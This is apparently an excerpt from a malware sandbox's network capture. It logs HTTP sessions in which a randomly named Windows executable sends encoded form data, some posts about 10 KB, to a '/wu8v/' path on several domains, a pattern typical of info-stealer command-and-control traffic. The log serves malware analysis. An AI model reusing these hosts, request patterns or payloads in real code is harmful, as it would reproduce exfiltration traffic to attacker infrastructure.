                                                                                                                    24 | 192.168.2.4 | 49767 | 185.135.132.99 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:08.446465015 CEST | 454 | OUT | GET /wu8v/?MdtlcTm=ahy6va04TVDXAoc0SI77WnjdL1KdrpLWXquRcgE4oyJhjsOsnbVcxGfgc5U1b6nV6qG/kRi3KVZWLm+W9jeCK1XNsz8i7l9KE7k2fsNVpgLsbvF63CsRx24=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:08.758023024 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:08 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: 5f8<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.yekobie.com | Powered by www.lws.fr | ID: 18732bdb438f78b2186286341506f179</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:08.758459091 CEST | 386 | IN |
                                                                                                                    Data Ascii: at short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    25 | 192.168.2.4 | 49768 | 35.213.232.35 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:14.624445915 CEST | 730 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.getgoodscrub.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.getgoodscrub.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=L/DxxAKNQ5nNUANUJ6gACqbxeyLb3wjcQ8kM5tLrEch/LIUu5kl9NrDSLv3436TCep+HZ+wl9sR09yUqrlQW0Pk73klzCZC8QNM5LS1PxJbFvxLgJHQfBTRENQA62/sj2zL3LWcpvWJ6/zaW/avDLqFQYmNnmo7w6RBxg7QMMu2ujcKdlpsczWFgQPgbm/dhwQ==
                                                                                                                    May 8, 2024 14:07:15.304558039 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:15 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Link: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                    Content-Encoding: br


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    26 | 192.168.2.4 | 49769 | 35.213.232.35 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:17.577522039 CEST | 750 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.getgoodscrub.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.getgoodscrub.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:18.238111973 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:18 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Link: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                    Content-Encoding: br


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    27 | 192.168.2.4 | 49770 | 35.213.232.35 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:20.526452065 CEST | 10832 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.getgoodscrub.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.getgoodscrub.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:21.128302097 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:20 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Link: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                    Content-Encoding: br


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    28 | 192.168.2.4 | 49771 | 35.213.232.35 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:23.486190081 CEST | 459 | OUT | GET /wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOztQaquY8UP2JEf8lkZo3Uj0uY+2wpGE8iKQtZfEVhbpqTk/gf9HUsxLCg=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:24.013814926 CEST  686  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:23 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOztQaquY8UP2JEf8lkZo3Uj0uY+2wpGE8iKQtZfEVhbpqTk/gf9HUsxLCg=&_X=ClAdyH4P7rA8z
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                                                                    X-Proxy-Cache: MISS
                                                                                                                    X-Proxy-Cache-Info: 0301 NC:000000 UP:


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    29          192.168.2.4  49772        47.76.62.167    80                2132  C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                    May 8, 2024 14:07:29.883814096 CEST  727  OUT  POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.xn--yzyp76d.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.xn--yzyp76d.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=4PFbAY/ugUKNvRmsRNIpw9LGEueC5N1GbvG1p8/aFrdRARXdBVd+ayMWY2zHUjVi1ukm7XEOw6QOEyurJ9CvIdDZ33M7mnpdADsOsAsFU5pjrV9+Q4Krohgm1m0+vhtU22/NUAsmNhE8SO9jSX0fMnljIW02HZU0oNm6t4SEAVWMaSi9cFkZoxpszZdwLFSwCA==
                                                                                                                    May 8, 2024 14:07:30.212421894 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:30 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    May 8, 2024 14:07:30.212436914 CEST  580  IN


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    30          192.168.2.4  49773        47.76.62.167    80                2132  C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                    May 8, 2024 14:07:32.736361980 CEST  747  OUT  POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.xn--yzyp76d.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.xn--yzyp76d.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=4PFbAY/ugUKNuy+sUugphNLFLOeC3t0NbvK1p+TKEdNRB0zdARB+fyMWfGzCLzV11uYI7VQOw6EOE3KrJO6sINDX8XM5rHpdADsOsARNU5xjqlt+Qcesrhghym0+rhtQ22/7UBhDNjM8SLBjclQcX3lpH21yGp5dicu2vryTPG7ubUznN0FO6xNfueUEGGv5ZAEi0FgkdegPuwo03NuZsTs=
                                                                                                                    May 8, 2024 14:07:33.058872938 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:32 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    May 8, 2024 14:07:33.058887959 CEST  580  IN


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    31          192.168.2.4  49774        47.76.62.167    80                2132  C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                    May 8, 2024 14:07:35.579751015 CEST  10829  OUT  POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.xn--yzyp76d.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.xn--yzyp76d.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm= [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:35.900353909 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:35 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    May 8, 2024 14:07:35.900382042 CEST  580  IN


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    32          192.168.2.4  49775        47.76.62.167    80                2132  C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                    May 8, 2024 14:07:38.447269917 CEST  458  OUT  GET /wu8v/?MdtlcTm=1Nt7DtzRhGe3jz/JXOJL2dnBH6uFnvwsc8PmoPLhBuJURU+BFCU8Z1cZNkrKfh5y7OIVqmEx6Y55MHCBN9ekEPrBm2pelHdYOjg1gnpKSYR8wHJ7U/KLji4=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:38.781186104 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:38 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Data Ascii: d49<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width"><title>.com</title> <link rel="stylesheet" href="http://www.marksmile.com/asset/lp_style.css" ></head><body><div class="main"><a href="https://mail.365.com/login.html" target="_blank"><img src="/file/mail.png" width="100%" height="auto" alt="365" style="position: absolute;top:0;left:0;z-index: 1;"></a><div class="dm" ><h2 id="domain">.com</h2></div><div class="bg"><div class="a"></div><div class="b"></div><div class="c"></div><div class="d"></div></div>...//co--><div class="co"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr><td align="left">:<img src="file/marksmile 1.png" width="76" height="20" alt="" style="position: absolut [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:38.781230927 CEST  1289  IN
                                                                                                                    Data Ascii: :<em style="display: block;font-size: 10px;font-style: normal;"></em><img class="wcode" width="60" height="60" src="http://www.marksmile.com/asset/lp_qrcode.png" id="myImage" /></div></td></tr><tr><td align="left"><div c
                                                                                                                    May 8, 2024 14:07:38.781248093 CEST  1018  IN
                                                                                                                    Data Ascii: e="application/javascript"></script><script> var image = document.getElementById("myImage"); // // function createEnlargedContainer() { var container = document.createElement('div
                                                                                                                    May 8, 2024 14:07:38.781259060 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    33          192.168.2.4  49776        213.36.252.182  80                2132  C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                    May 8, 2024 14:07:44.858798027 CEST  712  OUT  POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.btpbox.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.btpbox.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=KPjkWe+ZTCR1YyU8CLLRf/gvakPAZRYCT+IDQIYZGoR5GgHKweF7I32pvEY486wjtho+xZH4hEkEiUkLLoZRxmb3fNWamVOuQzwmpW2kuuwyc1g/vdBEz7tW7LBaS5Mly4iR1q/1urMXUg2vQ9jS2W1QYwPW855TPQdsyWhFMK3YOwG76jti4TcLiCWQGjriPQ==
May 8, 2024 14:07:45.162573099 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:45 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5060
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="DNSSEC, deposer, enregistrement, protection, serveurs DNS, hbergement, protg, grer, informations, hbergement, domaine parqu, renouvellement, nom de domaine, domaine RE, domaine UK, domaine RE, domaine BE, domaine XXX, domaine INFO, domaine UK, domaine EU, domaine NET, domaine LI, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/log [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49777 | 213.36.252.182 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:07:47.702189922 CEST | 732 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.btpbox.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.btpbox.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=KPjkWe+ZTCR1eSE8AozRU/guVEPAXxYGT+MDQK1EGaF5GB3Kxct7P32pnkY946woth02xdH4hHYEiRILL7hWjGbPXtWUp1OuQzwmpXSOuvUyfEQ/v4hL6btR+7BaYZMhy4i31ryeuuAXUlSvTpPR/W1WHAOEsKYIAw0QsFNcHunBGWXhrSM1qT44/FfkLgWrUfao1hjCMxJ7bDtAWNUNQBA=
May 8, 2024 14:07:48.005851030 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:47 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5055
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="renouvellement, grer, enregistrer, renouvellement, hebergement, reserver, protection, enregistrement, IDN, protger, reserver, achat, noms de domaine, domaine CC, domaine CH, domaine CC, domaine CH, domaine ME, domaine ME, domaine RE, domaine ME, domaine IN, domaine CH, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/logo_book.gif" alt [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49778 | 213.36.252.182 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:07:50.542541027 CEST | 10814 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.btpbox.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.btpbox.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 14:07:50.846993923 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:50 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5056
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
